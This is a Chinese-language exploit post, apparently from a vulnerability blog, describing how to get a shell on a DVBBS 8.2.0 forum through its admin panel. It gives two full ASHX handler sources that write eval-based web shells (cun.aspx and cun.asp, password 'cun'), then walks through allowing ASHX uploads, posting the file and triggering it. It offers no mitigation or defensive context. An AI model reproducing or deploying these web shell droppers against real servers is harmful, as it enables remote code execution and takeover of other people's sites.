DVBBS 8.2.0 后台 GET SHELL
- 发表于
- Vulndb
和添加PHP一样,如何上传的php不能解析,或则管理员将PHP禁用的另外一则方法
前提:支持ASPX,因为ASPX不能上传,我们需要上传的是ASHX
源码:
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"cun\"]"+",\"unsafe\");%>"; StreamWriter file1= File.CreateText(context.Server.MapPath("cun.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
保存为1.ashx
上传源码不行的话,尝试下面的源码
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("cun.asp"));
file1.Write("GIF89a888<%Cun=REquEst(\"CUN\"):EvaL(Cun)%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
后台 版面管理=》版面(分类)管理=》随便一个版面=》高级设置=》添加上传类型ASHX
然后前台发表新帖,上传ASHX,记得要发表帖子,ASHX才能保存
上传后,后台文件管理=》上传文件管理=》最近24小时内上传的文件,找到你的ASHX,如何是第一个1.ASHX源码,则会在同目录生成cun.aspx,密码cun,第二款源码会生成cun.asp,密码cun
原文连接:DVBBS 8.2.0 后台 GET SHELL
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
